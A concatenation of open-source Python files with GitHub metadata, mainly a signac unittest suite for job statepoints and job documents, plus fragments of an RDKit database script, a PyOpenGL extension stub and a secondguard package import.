fpConn.Commit()
if len(morganRows):
fpCurs.executemany('insert into %s values (?,?,?)' % options.morganFpTableName, morganRows)
morganRows = []
fpConn.Commit()
if not options.silent:
logger.info('Finished.')
if __name__ == '__main__':
parser = initParser()
options = parser.parse_args()
if options.loadMols:
if options.filename is None:
parser.error('please provide a filename argument')
dataFilename = options.filename
try:
dataFile = open(dataFilename, 'r')
except IOError:
logger.error('input file %s does not exist' % (dataFilename))
sys.exit(0)
dataFile = None
if not options.outDir:
prefix = os.path.splitext(dataFilename)[0]
options.outDir = prefix
if not os.path.exists(options.outDir):
try:
os.mkdir(options.outDir)
except Exception:
logger.error('could not create output directory %s' % options.outDir)
sys.exit(1)
if 1:
CreateDb(options, dataFilename)
else:
import cProfile
cProfile.run("CreateDb(options,dataFilename)", "create.prof")
import pstats
p = pstats.Stats('create.prof')
p.strip_dirs().sort_stats('cumulative').print_stats(25)
| {
"content_hash": "f85783a69c80ea6e32234adbdfe8bcb3",
"timestamp": "",
"source": "github",
"line_count": 442,
"max_line_length": 117,
"avg_line_length": 43.047511312217196,
"alnum_prop": 0.649760866137594,
"repo_name": "ptosco/rdkit",
"id": "f62f855dfad88d176fb47373cbb215dd457fedeb",
"size": "20726",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "Projects/DbCLI/CreateDb.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1595174"
},
{
"name": "C#",
"bytes": "10167"
},
{
"name": "C++",
"bytes": "13851292"
},
{
"name": "CMake",
"bytes": "761863"
},
{
"name": "Dockerfile",
"bytes": "2590"
},
{
"name": "Fortran",
"bytes": "7590"
},
{
"name": "HTML",
"bytes": "43059702"
},
{
"name": "Java",
"bytes": "369457"
},
{
"name": "JavaScript",
"bytes": "54009"
},
{
"name": "Jupyter Notebook",
"bytes": "498341"
},
{
"name": "LLVM",
"bytes": "40048"
},
{
"name": "Lex",
"bytes": "4508"
},
{
"name": "Makefile",
"bytes": "10862"
},
{
"name": "Python",
"bytes": "4157348"
},
{
"name": "QMake",
"bytes": "389"
},
{
"name": "SMT",
"bytes": "3010"
},
{
"name": "SWIG",
"bytes": "342569"
},
{
"name": "Shell",
"bytes": "3822"
},
{
"name": "Smarty",
"bytes": "5864"
},
{
"name": "Yacc",
"bytes": "61677"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import unittest
import os
import io
import warnings
import logging
import uuid
import copy
import random
import json
import signac.contrib
import signac.common.config
from signac.common import six
from signac.errors import DestinationExistsError
from signac.errors import JobsCorruptedError
if six.PY2:
from tempdir import TemporaryDirectory
else:
from tempfile import TemporaryDirectory
# Make sure the jobs created for this test are unique.
test_token = {'test_token': str(uuid.uuid4())}
warnings.simplefilter('default')
warnings.filterwarnings('error', category=DeprecationWarning, module='signac')
warnings.filterwarnings(
'ignore', category=PendingDeprecationWarning, message=r'.*Cache API.*')
BUILTINS = [
({'e': [1.0, '1.0', 1, True]}, '4d8058a305b940005be419b30e99bb53'),
({'d': True}, '33cf9999de25a715a56339c6c1b28b41'),
({'f': (1.0, '1.0', 1, True)}, 'e998db9b595e170bdff936f88ccdbf75'),
({'a': 1}, '42b7b4f2921788ea14dac5566e6f06d0'),
({'c': '1.0'}, '80fa45716dd3b83fa970877489beb42e'),
({'b': 1.0}, '0ba6c5a46111313f11c41a6642520451'),
]
def builtins_dict():
random.shuffle(BUILTINS)
d = dict()
for b in BUILTINS:
d.update(b[0])
return d
BUILTINS_HASH = '7a80b58db53bbc544fc27fcaaba2ce44'
NESTED_HASH = 'bd6f5828f4410b665bffcec46abeb8f3'
def config_from_cfg(cfg):
cfile = io.StringIO('\n'.join(cfg))
return signac.common.config.get_config(cfile)
def testdata():
return str(uuid.uuid4())
class BaseJobTest(unittest.TestCase):
project_class = signac.Project
def setUp(self):
self._tmp_dir = TemporaryDirectory(prefix='signac_')
self.addCleanup(self._tmp_dir.cleanup)
self._tmp_pr = os.path.join(self._tmp_dir.name, 'pr')
self._tmp_wd = os.path.join(self._tmp_dir.name, 'wd')
os.mkdir(self._tmp_pr)
self.config = signac.common.config.load_config()
self.project = self.project_class.init_project(
name='testing_test_project',
root=self._tmp_pr,
workspace=self._tmp_wd)
self.project.config['default_host'] = 'testing'
def tearDown(self):
pass
def open_job(self, *args, **kwargs):
project = self.project
return project.open_job(*args, **kwargs)
@classmethod
def nested_dict(self):
d = dict(builtins_dict())
d['g'] = builtins_dict()
return d
class JobIDTest(BaseJobTest):
def test_builtins(self):
for p, h in BUILTINS:
self.assertEqual(str(self.project.open_job(p)), h)
self.assertEqual(
str(self.project.open_job(builtins_dict())), BUILTINS_HASH)
def test_shuffle(self):
for i in range(10):
self.assertEqual(
str(self.project.open_job(builtins_dict())), BUILTINS_HASH)
def test_nested(self):
for i in range(10):
self.assertEqual(
str(self.project.open_job(self.nested_dict())), NESTED_HASH)
def test_sequences_identity(self):
job1 = self.project.open_job({'a': [1.0, '1.0', 1, True]})
job2 = self.project.open_job({'a': (1.0, '1.0', 1, True)})
self.assertEqual(str(job1), str(job2))
self.assertEqual(job1.statepoint(), job2.statepoint())
class JobTest(BaseJobTest):
def test_repr(self):
job = self.project.open_job({'a': 0})
job2 = self.project.open_job({'a': 0})
self.assertEqual(repr(job), repr(job2))
self.assertEqual(job, job2)
def test_str(self):
job = self.project.open_job({'a': 0})
self.assertEqual(str(job), job.get_id())
def test_isfile(self):
job = self.project.open_job({'a': 0})
fn = 'test.txt'
fn_ = os.path.join(job.workspace(), fn)
self.assertFalse(job.isfile(fn))
job.init()
self.assertFalse(job.isfile(fn))
with open(fn_, 'w') as file:
file.write('hello')
self.assertTrue(job.isfile(fn))
class JobSPInterfaceTest(BaseJobTest):
def test_interface_read_only(self):
sp = self.nested_dict()
job = self.open_job(sp)
self.assertEqual(job.statepoint(), json.loads(json.dumps(sp)))
for x in ('a', 'b', 'c', 'd', 'e'):
self.assertEqual(getattr(job.sp, x), sp[x])
self.assertEqual(job.sp[x], sp[x])
for x in ('a', 'b', 'c', 'd', 'e'):
self.assertEqual(getattr(job.sp.g, x), sp['g'][x])
self.assertEqual(job.sp[x], sp[x])
for x in ('a', 'b', 'c', 'd', 'e'):
self.assertEqual(job.sp.get(x), sp[x])
self.assertEqual(job.sp.get(x), sp[x])
self.assertEqual(job.sp.g.get(x), sp['g'][x])
self.assertIsNone(job.sp.get('not_in_sp'))
self.assertIsNone(job.sp.g.get('not_in_sp'))
self.assertIsNone(job.sp.get('not_in_sp', None))
self.assertIsNone(job.sp.g.get('not_in_sp', None))
self.assertEqual(job.sp.get('not_in_sp', 23), 23)
self.assertEqual(job.sp.g.get('not_in_sp', 23), 23)
def test_interface_contains(self):
sp = self.nested_dict()
job = self.open_job(sp)
for x in ('a', 'b', 'c', 'd', 'e'):
self.assertIn(x, job.sp)
self.assertIn(x, job.sp.g)
def test_interface_read_write(self):
sp = self.nested_dict()
job = self.open_job(sp)
job.init()
for x in ('a', 'b', 'c', 'd', 'e'):
self.assertEqual(getattr(job.sp, x), sp[x])
self.assertEqual(job.sp[x], sp[x])
for x in ('a', 'b', 'c', 'd', 'e'):
self.assertEqual(getattr(job.sp.g, x), sp['g'][x])
self.assertEqual(job.sp[x], sp[x])
l = [1, 1.0, '1.0', True, None]
b = list(l) + [l] + [tuple(l)]
for v in b:
for x in ('a', 'b', 'c', 'd', 'e'):
setattr(job.sp, x, v)
self.assertEqual(getattr(job.sp, x), v)
setattr(job.sp.g, x, v)
self.assertEqual(getattr(job.sp.g, x), v)
def test_interface_nested_kws(self):
job = self.open_job({'a.b.c': 0})
self.assertEqual(job.sp['a.b.c'], 0)
with self.assertRaises(AttributeError):
job.sp.a.b.c
job.sp['a.b.c'] = 1
self.assertEqual(job.sp['a.b.c'], 1)
job.sp.a = dict(b=dict(c=2))
self.assertEqual(job.sp.a.b.c, 2)
self.assertEqual(job.sp['a']['b']['c'], 2)
def test_interface_reserved_keywords(self):
job = self.open_job({'with': 0, 'pop': 1})
self.assertEqual(job.sp['with'], 0)
self.assertEqual(job.sp['pop'], 1)
self.assertEqual(job.sp.pop('with'), 0)
self.assertNotIn('with', job.sp)
def test_interface_illegal_type(self):
job = self.open_job(dict(a=0))
self.assertEqual(job.sp.a, 0)
class Foo(object):
pass
with self.assertRaises(TypeError):
job.sp.a = Foo()
def test_interface_rename(self):
job = self.open_job(dict(a=0))
job.init()
self.assertEqual(job.sp.a, 0)
job.sp.b = job.sp.pop('a')
self.assertNotIn('a', job.sp)
self.assertEqual(job.sp.b, 0)
def test_interface_add(self):
job = self.open_job(dict(a=0))
job.init()
with self.assertRaises(AttributeError):
job.sp.b
job.sp.b = 1
self.assertIn('b', job.sp)
self.assertEqual(job.sp.b, 1)
def test_interface_delete(self):
job = self.open_job(dict(a=0, b=0))
job.init()
self.assertIn('b', job.sp)
self.assertEqual(job.sp.b, 0)
del job.sp['b']
self.assertNotIn('b', job.sp)
with self.assertRaises(AttributeError):
job.sp.b
def test_interface_destination_conflict(self):
job_a = self.open_job(dict(a=0))
job_b = self.open_job(dict(b=0))
job_a.init()
id_a = job_a.get_id()
job_a.sp = dict(b=0)
self.assertEqual(job_a.statepoint(), dict(b=0))
self.assertEqual(job_a, job_b)
self.assertNotEqual(job_a.get_id(), id_a)
job_a = self.open_job(dict(a=0))
# Moving to existing job, no problem while empty:
self.assertNotEqual(job_a, job_b)
job_a.sp = dict(b=0)
job_a = self.open_job(dict(a=0))
job_b.init()
# Moving to an existing job with data leads
# to an error:
job_a.document['a'] = 0
job_b.document['a'] = 0
self.assertNotEqual(job_a, job_b)
with self.assertRaises(RuntimeError):
job_a.sp = dict(b=0)
with self.assertRaises(DestinationExistsError):
job_a.sp = dict(b=0)
def test_interface_multiple_changes(self):
for i in range(1, 4):
job = self.project.open_job(dict(a=i))
job.init()
for job in self.project:
self.assertTrue(job.sp.a > 0)
for job in self.project:
obj_id = id(job)
id0 = job.get_id()
sp0 = job.statepoint()
self.assertEqual(id(job), obj_id)
self.assertTrue(job.sp.a > 0)
self.assertEqual(job.get_id(), id0)
self.assertEqual(job.sp, sp0)
job.sp.a = - job.sp.a
self.assertEqual(id(job), obj_id)
self.assertTrue(job.sp.a < 0)
self.assertNotEqual(job.get_id(), id0)
self.assertNotEqual(job.sp, sp0)
job.sp.a = - job.sp.a
self.assertEqual(id(job), obj_id)
self.assertTrue(job.sp.a > 0)
self.assertEqual(job.get_id(), id0)
self.assertEqual(job.sp, sp0)
job2 = self.project.open_job(id=id0)
self.assertEqual(job.sp, job2.sp)
self.assertEqual(job.get_id(), job2.get_id())
class ConfigTest(BaseJobTest):
def test_set_get_delete(self):
key, value = list(test_token.items())[0]
key, value = 'author_name', list(test_token.values())[0]
config = copy.deepcopy(self.project.config)
config[key] = value
self.assertEqual(config[key], value)
self.assertIn(key, config)
del config[key]
self.assertNotIn(key, config)
def test_update(self):
key, value = 'author_name', list(test_token.values())[0]
config = copy.deepcopy(self.project.config)
config.update({key: value})
self.assertEqual(config[key], value)
self.assertIn(key, config)
def test_set_and_retrieve_version(self):
fake_version = 0, 0, 0
self.project.config['signac_version'] = fake_version
self.assertEqual(self.project.config['signac_version'], fake_version)
def test_str(self):
str(self.project.config)
class JobOpenAndClosingTest(BaseJobTest):
def test_init(self):
job = self.open_job(test_token)
self.assertFalse(os.path.isdir(job.workspace()))
job.init()
self.assertEqual(job.workspace(), job.ws)
self.assertTrue(os.path.isdir(job.workspace()))
self.assertTrue(os.path.isdir(job.ws))
self.assertTrue(os.path.exists(os.path.join(job.workspace(), job.FN_MANIFEST)))
def test_construction(self):
job = self.open_job(test_token)
job2 = eval(repr(job))
self.assertEqual(job, job2)
def test_open_job_close(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore')
with self.open_job(test_token) as job:
pass
job.remove()
def test_open_job_close_manual(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore')
job = self.open_job(test_token)
job.open()
job.close()
job.remove()
def test_open_job_close_with_error(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore')
job = self.open_job(test_token)
class TestError(Exception):
pass
with self.assertRaises(TestError):
with job:
raise TestError()
job.remove()
def test_reopen_job(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore')
with self.open_job(test_token) as job:
job_id = job.get_id()
self.assertEqual(str(job_id), str(job))
with self.open_job(test_token) as job:
self.assertEqual(job.get_id(), job_id)
job.remove()
def test_close_nonopen_job(self):
job = self.open_job(test_token)
job.close()
with job:
pass
def test_close_job_while_open(self):
rp = os.path.realpath
cwd = rp(os.getcwd())
job = self.open_job(test_token)
with job:
job.close()
self.assertEqual(cwd, rp(os.getcwd()))
def test_open_job_recursive(self):
rp = os.path.realpath
cwd = rp(os.getcwd())
job = self.open_job(test_token)
with job:
self.assertEqual(rp(job.workspace()), rp(os.getcwd()))
self.assertEqual(cwd, rp(os.getcwd()))
with job:
self.assertEqual(rp(job.workspace()), rp(os.getcwd()))
os.chdir(self.project.root_directory())
self.assertEqual(cwd, rp(os.getcwd()))
with job:
self.assertEqual(rp(job.workspace()), rp(os.getcwd()))
with job:
self.assertEqual(rp(job.workspace()), rp(os.getcwd()))
self.assertEqual(rp(job.workspace()), rp(os.getcwd()))
self.assertEqual(cwd, rp(os.getcwd()))
with job:
self.assertEqual(rp(job.workspace()), rp(os.getcwd()))
os.chdir(self.project.root_directory())
with job:
self.assertEqual(rp(job.workspace()), rp(os.getcwd()))
self.assertEqual(rp(os.getcwd()), rp(self.project.root_directory()))
self.assertEqual(cwd, rp(os.getcwd()))
with job:
job.close()
self.assertEqual(cwd, rp(os.getcwd()))
with job:
self.assertEqual(rp(job.workspace()), rp(os.getcwd()))
self.assertEqual(cwd, rp(os.getcwd()))
self.assertEqual(cwd, rp(os.getcwd()))
def test_corrupt_workspace(self):
job = self.open_job(test_token)
job.init()
fn_manifest = os.path.join(job.workspace(), job.FN_MANIFEST)
with open(fn_manifest, 'w') as file:
file.write("corrupted")
job2 = self.open_job(test_token)
try:
logging.disable(logging.ERROR)
with self.assertRaises(JobsCorruptedError):
job2.init()
finally:
logging.disable(logging.NOTSET)
job2.init(force=True)
job2.init()
class JobDocumentTest(BaseJobTest):
def test_get_set(self):
key = 'get_set'
d = testdata()
job = self.open_job(test_token)
self.assertFalse(bool(job.document))
self.assertEqual(len(job.document), 0)
self.assertNotIn(key, job.document)
job.document[key] = d
self.assertTrue(bool(job.document))
self.assertEqual(len(job.document), 1)
self.assertIn(key, job.document)
self.assertEqual(job.document[key], d)
self.assertEqual(job.document.get(key), d)
self.assertEqual(job.document.get('bs', d), d)
def test_del(self):
key = 'del0'
key1 = 'del1'
d = testdata()
d1 = testdata()
job = self.open_job(test_token)
self.assertEqual(len(job.document), 0)
self.assertNotIn(key, job.document)
job.document[key] = d
self.assertEqual(len(job.document), 1)
self.assertIn(key, job.document)
job.document[key1] = d1
self.assertEqual(len(job.document), 2)
self.assertIn(key, job.document)
self.assertIn(key1, job.document)
self.assertEqual(job.document[key], d)
self.assertEqual(job.document[key1], d1)
del job.document[key]
self.assertEqual(len(job.document), 1)
self.assertIn(key1, job.document)
self.assertNotIn(key, job.document)
def test_get_set_doc(self):
key = 'get_set'
d = testdata()
job = self.open_job(test_token)
self.assertFalse(bool(job.doc))
self.assertEqual(len(job.doc), 0)
self.assertNotIn(key, job.doc)
job.doc[key] = d
self.assertTrue(bool(job.doc))
self.assertEqual(len(job.doc), 1)
self.assertIn(key, job.doc)
self.assertEqual(job.doc[key], d)
self.assertEqual(job.doc.get(key), d)
self.assertEqual(job.doc.get('bs', d), d)
def test_set_set_doc(self):
key0, key1 = 'set_set0', 'set_set1'
d0, d1 = testdata(), testdata()
job = self.open_job(test_token)
self.assertFalse(bool(job.doc))
self.assertEqual(len(job.doc), 0)
self.assertNotIn(key0, job.doc)
job.doc[key0] = d0
self.assertTrue(bool(job.doc))
self.assertEqual(len(job.doc), 1)
self.assertIn(key0, job.doc)
self.assertEqual(job.doc[key0], d0)
job = self.open_job(test_token)
self.assertTrue(bool(job.doc))
self.assertEqual(len(job.doc), 1)
self.assertIn(key0, job.doc)
self.assertEqual(job.doc[key0], d0)
job = self.open_job(test_token)
job.document[key1] = d1
self.assertTrue(bool(job.doc))
self.assertEqual(len(job.doc), 2)
self.assertIn(key0, job.doc)
self.assertIn(key1, job.doc)
self.assertEqual(job.doc[key0], d0)
self.assertEqual(job.doc[key1], d1)
def test_get_set_nested(self):
d0 = testdata()
d1 = testdata()
d2 = testdata()
assert d0 != d1 != d2
job = self.open_job(test_token)
self.assertEqual(len(job.document), 0)
self.assertNotIn('key0', job.document)
job.document['key0'] = d0
self.assertEqual(len(job.document), 1)
self.assertIn('key0', job.document)
self.assertEqual(job.document['key0'], d0)
with self.assertRaises(AttributeError):
job.document.key0.key1
job.document.key0 = {'key1': d0}
self.assertEqual(len(job.document), 1)
self.assertIn('key0', job.document)
self.assertEqual(job.document(), {'key0': {'key1': d0}})
self.assertEqual(job.document['key0'], {'key1': d0})
self.assertEqual(job.document['key0']['key1'], d0)
self.assertEqual(job.document.key0, {'key1': d0})
self.assertEqual(job.document.key0.key1, d0)
job.document.key0.key1 = d1
self.assertEqual(job.document, {'key0': {'key1': d1}})
self.assertEqual(job.document['key0'], {'key1': d1})
self.assertEqual(job.document['key0']['key1'], d1)
self.assertEqual(job.document.key0, {'key1': d1})
self.assertEqual(job.document.key0.key1, d1)
job.document['key0']['key1'] = d2
self.assertEqual(job.document, {'key0': {'key1': d2}})
self.assertEqual(job.document['key0'], {'key1': d2})
self.assertEqual(job.document['key0']['key1'], d2)
self.assertEqual(job.document.key0, {'key1': d2})
self.assertEqual(job.document.key0.key1, d2)
def test_get_set_nested_doc(self):
d0 = testdata()
d1 = testdata()
d2 = testdata()
assert d0 != d1 != d2
job = self.open_job(test_token)
self.assertEqual(len(job.doc), 0)
self.assertNotIn('key0', job.doc)
job.doc['key0'] = d0
self.assertEqual(len(job.doc), 1)
self.assertIn('key0', job.doc)
self.assertEqual(job.doc['key0'], d0)
with self.assertRaises(AttributeError):
job.doc.key0.key1
job.doc.key0 = {'key1': d0}
self.assertEqual(len(job.doc), 1)
self.assertIn('key0', job.doc)
self.assertEqual(job.doc(), {'key0': {'key1': d0}})
self.assertEqual(job.doc['key0'], {'key1': d0})
self.assertEqual(job.doc['key0']['key1'], d0)
self.assertEqual(job.doc.key0, {'key1': d0})
self.assertEqual(job.doc.key0.key1, d0)
job.doc.key0.key1 = d1
self.assertEqual(job.doc, {'key0': {'key1': d1}})
self.assertEqual(job.doc['key0'], {'key1': d1})
self.assertEqual(job.doc['key0']['key1'], d1)
self.assertEqual(job.doc.key0, {'key1': d1})
self.assertEqual(job.doc.key0.key1, d1)
job.doc['key0']['key1'] = d2
self.assertEqual(job.doc, {'key0': {'key1': d2}})
self.assertEqual(job.doc['key0'], {'key1': d2})
self.assertEqual(job.doc['key0']['key1'], d2)
self.assertEqual(job.doc.key0, {'key1': d2})
self.assertEqual(job.doc.key0.key1, d2)
def test_assign(self):
key = 'assign'
d0 = testdata()
d1 = testdata()
job = self.open_job(test_token)
self.assertEqual(len(job.document), 0)
job.document[key] = d0
self.assertEqual(len(job.document), 1)
self.assertEqual(job.document(), {key: d0})
with self.assertRaises(ValueError):
job.document = d1
job.document = {key: d1}
self.assertEqual(len(job.document), 1)
self.assertEqual(job.document(), {key: d1})
def test_assign_doc(self):
key = 'assign'
d0 = testdata()
d1 = testdata()
job = self.open_job(test_token)
self.assertEqual(len(job.doc), 0)
job.doc[key] = d0
self.assertEqual(len(job.doc), 1)
self.assertEqual(job.doc(), {key: d0})
with self.assertRaises(ValueError):
job.doc = d1
job.doc = {key: d1}
self.assertEqual(len(job.doc), 1)
self.assertEqual(job.doc(), {key: d1})
def test_copy_document(self):
key = 'get_set'
d = testdata()
job = self.open_job(test_token)
job.document[key] = d
self.assertTrue(bool(job.document))
self.assertEqual(len(job.document), 1)
self.assertIn(key, job.document)
self.assertEqual(job.document[key], d)
self.assertEqual(job.document.get(key), d)
self.assertEqual(job.document.get('bs', d), d)
copy = dict(job.document)
self.assertTrue(bool(copy))
self.assertEqual(len(copy), 1)
self.assertIn(key, copy)
self.assertEqual(copy[key], d)
self.assertEqual(copy.get(key), d)
self.assertEqual(copy.get('bs', d), d)
def test_update(self):
key = 'get_set'
d = testdata()
job = self.open_job(test_token)
job.document.update({key: d})
self.assertIn(key, job.document)
def test_clear_document(self):
key = 'clear'
d = testdata()
job = self.open_job(test_token)
job.document[key] = d
self.assertIn(key, job.document)
self.assertEqual(len(job.document), 1)
job.document.clear()
self.assertNotIn(key, job.document)
self.assertEqual(len(job.document), 0)
def test_reopen(self):
key = 'clear'
d = testdata()
job = self.open_job(test_token)
job.document[key] = d
self.assertIn(key, job.document)
self.assertEqual(len(job.document), 1)
job2 = self.open_job(test_token)
self.assertIn(key, job2.document)
self.assertEqual(len(job2.document), 1)
def test_concurrency(self):
key = 'concurrent'
d = testdata()
job = self.open_job(test_token)
job2 = self.open_job(test_token)
self.assertNotIn(key, job.document)
self.assertNotIn(key, job2.document)
job.document[key] = d
self.assertIn(key, job.document)
self.assertIn(key, job2.document)
def test_remove(self):
key = 'remove'
job = self.open_job(test_token)
job.remove()
d = testdata()
job.document[key] = d
self.assertIn(key, job.document)
self.assertEqual(len(job.document), 1)
fn_test = os.path.join(job.workspace(), 'test')
with open(fn_test, 'w') as file:
file.write('test')
self.assertTrue(os.path.isfile(fn_test))
job.remove()
self.assertNotIn(key, job.document)
self.assertFalse(os.path.isfile(fn_test))
def test_clear_job(self):
key = 'clear'
job = self.open_job(test_token)
self.assertNotIn(job, self.project)
job.clear()
self.assertNotIn(job, self.project)
job.clear()
self.assertNotIn(job, self.project)
job.init()
self.assertIn(job, self.project)
job.clear()
self.assertIn(job, self.project)
job.clear()
job.clear()
self.assertIn(job, self.project)
d = testdata()
job.document[key] = d
self.assertIn(job, self.project)
self.assertIn(key, job.document)
self.assertEqual(len(job.document), 1)
job.clear()
self.assertEqual(len(job.document), 0)
with open(job.fn('test'), 'w') as file:
file.write('test')
self.assertTrue(job.isfile('test'))
self.assertIn(job, self.project)
job.clear()
self.assertFalse(job.isfile('test'))
self.assertEqual(len(job.document), 0)
def test_reset(self):
key = 'reset'
job = self.open_job(test_token)
self.assertNotIn(job, self.project)
job.reset()
self.assertIn(job, self.project)
self.assertEqual(len(job.document), 0)
job.document[key] = testdata()
self.assertEqual(len(job.document), 1)
job.reset()
self.assertIn(job, self.project)
self.assertEqual(len(job.document), 0)
def test_doc(self):
key = 'test_doc'
job = self.open_job(test_token)
def check_content(key, d):
self.assertEqual(job.doc[key], d)
self.assertEqual(getattr(job.doc, key), d)
self.assertEqual(job.doc()[key], d)
self.assertEqual(job.document[key], d)
self.assertEqual(getattr(job.document, key), d)
self.assertEqual(job.document()[key], d)
d = testdata()
job.doc[key] = d
check_content(key, d)
d2 = testdata()
job.doc[key] = d2
check_content(key, d2)
d3 = testdata()
job.document[key] = d3
check_content(key, d3)
d4 = testdata()
setattr(job.doc, key, d4)
check_content(key, d4)
def test_sp_formatting(self):
job = self.open_job({'a': 0})
self.assertEqual('{job.statepoint.a}'.format(job=job), str(job.sp.a))
self.assertEqual('{job.sp.a}'.format(job=job), str(job.sp.a))
self.assertEqual('{job.statepoint[a]}'.format(job=job), str(job.sp.a))
self.assertEqual('{job.sp[a]}'.format(job=job), str(job.sp.a))
job.sp.a = dict(b=0)
self.assertEqual('{job.statepoint.a.b}'.format(job=job), str(job.sp.a.b))
self.assertEqual('{job.sp.a.b}'.format(job=job), str(job.sp.a.b))
self.assertEqual('{job.statepoint[a][b]}'.format(job=job), str(job.sp.a.b))
self.assertEqual('{job.sp[a][b]}'.format(job=job), str(job.sp.a.b))
def test_doc_formatting(self):
job = self.open_job(test_token)
job.doc.a = 0
self.assertEqual('{job.doc.a}'.format(job=job), str(job.doc.a))
self.assertEqual('{job.doc[a]}'.format(job=job), str(job.doc.a))
self.assertEqual('{job.document.a}'.format(job=job), str(job.doc.a))
self.assertEqual('{job.document[a]}'.format(job=job), str(job.doc.a))
job.doc.a = dict(b=0)
self.assertEqual('{job.doc.a.b}'.format(job=job), str(job.doc.a.b))
self.assertEqual('{job.doc.a.b}'.format(job=job), str(job.doc.a.b))
self.assertEqual('{job.document.a.b}'.format(job=job), str(job.doc.a.b))
self.assertEqual('{job.document[a][b]}'.format(job=job), str(job.doc.a.b))
def test_reset_statepoint_job(self):
key = 'move_job'
d = testdata()
src = test_token
dst = dict(test_token)
dst['dst'] = True
src_job = self.open_job(src)
src_job.document[key] = d
self.assertIn(key, src_job.document)
self.assertEqual(len(src_job.document), 1)
src_job.reset_statepoint(dst)
src_job = self.open_job(src)
dst_job = self.open_job(dst)
self.assertIn(key, dst_job.document)
self.assertEqual(len(dst_job.document), 1)
self.assertNotIn(key, src_job.document)
with self.assertRaises(RuntimeError):
src_job.reset_statepoint(dst)
with self.assertRaises(DestinationExistsError):
src_job.reset_statepoint(dst)
def test_reset_statepoint_project(self):
key = 'move_job'
d = testdata()
src = test_token
dst = dict(test_token)
dst['dst'] = True
src_job = self.open_job(src)
src_job.document[key] = d
self.assertIn(key, src_job.document)
self.assertEqual(len(src_job.document), 1)
self.project.reset_statepoint(src_job, dst)
src_job = self.open_job(src)
dst_job = self.open_job(dst)
self.assertIn(key, dst_job.document)
self.assertEqual(len(dst_job.document), 1)
self.assertNotIn(key, src_job.document)
with self.assertRaises(RuntimeError):
self.project.reset_statepoint(src_job, dst)
with self.assertRaises(DestinationExistsError):
self.project.reset_statepoint(src_job, dst)
def test_update_statepoint(self):
key = 'move_job'
d = testdata()
src = test_token
extension = {'dst': True}
dst = dict(src)
dst.update(extension)
extension2 = {'dst': False}
dst2 = dict(src)
dst2.update(extension2)
src_job = self.open_job(src)
src_job.document[key] = d
self.assertIn(key, src_job.document)
self.assertEqual(len(src_job.document), 1)
self.project.update_statepoint(src_job, extension)
src_job = self.open_job(src)
dst_job = self.open_job(dst)
self.assertEqual(dst_job.statepoint(), dst)
self.assertIn(key, dst_job.document)
self.assertEqual(len(dst_job.document), 1)
self.assertNotIn(key, src_job.document)
with self.assertRaises(RuntimeError):
self.project.reset_statepoint(src_job, dst)
with self.assertRaises(DestinationExistsError):
self.project.reset_statepoint(src_job, dst)
with self.assertRaises(KeyError):
self.project.update_statepoint(dst_job, extension2)
self.project.update_statepoint(dst_job, extension2, overwrite=True)
dst2_job = self.open_job(dst2)
self.assertEqual(dst2_job.statepoint(), dst2)
self.assertIn(key, dst2_job.document)
self.assertEqual(len(dst2_job.document), 1)
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "549c85e3e6e1842a0a12f9704c2584dd",
"timestamp": "",
"source": "github",
"line_count": 873,
"max_line_length": 87,
"avg_line_length": 35.67124856815578,
"alnum_prop": 0.5757682797598022,
"repo_name": "csadorf/signac",
"id": "c5c7d766e62a8dd9d5e3185d83409fc0f10bfbcc",
"size": "31287",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_job.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "673188"
},
{
"name": "Shell",
"bytes": "6879"
},
{
"name": "TeX",
"bytes": "938"
}
],
"symlink_target": ""
} |
'''OpenGL extension SGIX.shadow_ambient
Automatically generated by the get_gl_extensions script, do not edit!
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions
from OpenGL.GL import glget
import ctypes
EXTENSION_NAME = 'GL_SGIX_shadow_ambient'
_DEPRECATED = False
GL_SHADOW_AMBIENT_SGIX = constant.Constant( 'GL_SHADOW_AMBIENT_SGIX', 0x80BF )
def glInitShadowAmbientSGIX():
'''Return boolean indicating whether this extension is available'''
return extensions.hasGLExtension( EXTENSION_NAME )
| {
"content_hash": "0ac225855d9532cea2a33de5c24aaebf",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 78,
"avg_line_length": 34.0625,
"alnum_prop": 0.7834862385321101,
"repo_name": "Universal-Model-Converter/UMC3.0a",
"id": "a2d8083e9a60cd128404da5d896051aef8cef837",
"size": "545",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "data/Python/x86/Lib/site-packages/OpenGL/raw/GL/SGIX/shadow_ambient.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "226"
},
{
"name": "C",
"bytes": "1082640"
},
{
"name": "C#",
"bytes": "8440"
},
{
"name": "C++",
"bytes": "3621086"
},
{
"name": "CSS",
"bytes": "6226"
},
{
"name": "F#",
"bytes": "2310"
},
{
"name": "FORTRAN",
"bytes": "7795"
},
{
"name": "Forth",
"bytes": "506"
},
{
"name": "GLSL",
"bytes": "1040"
},
{
"name": "Groff",
"bytes": "5943"
},
{
"name": "HTML",
"bytes": "1196266"
},
{
"name": "Java",
"bytes": "5793"
},
{
"name": "Makefile",
"bytes": "1109"
},
{
"name": "Mask",
"bytes": "969"
},
{
"name": "Matlab",
"bytes": "4346"
},
{
"name": "Python",
"bytes": "33351557"
},
{
"name": "R",
"bytes": "1370"
},
{
"name": "Shell",
"bytes": "6931"
},
{
"name": "Tcl",
"bytes": "2084458"
},
{
"name": "Visual Basic",
"bytes": "481"
}
],
"symlink_target": ""
} |
from .main import sg_hybrid_decrypt, sg_hybrid_encrypt, sg_hybrid_encrypt_with_auditlog
from .secondguard import RateLimitError, BadRequestError
| {
"content_hash": "b1417bf687bd94a88d788033ce7b7d8b",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 87,
"avg_line_length": 48.666666666666664,
"alnum_prop": 0.8287671232876712,
"repo_name": "secondguard/secondguard-python",
"id": "bf41356257a99de0ef5e645a52a5a4ba77bfcf73",
"size": "146",
"binary": false,
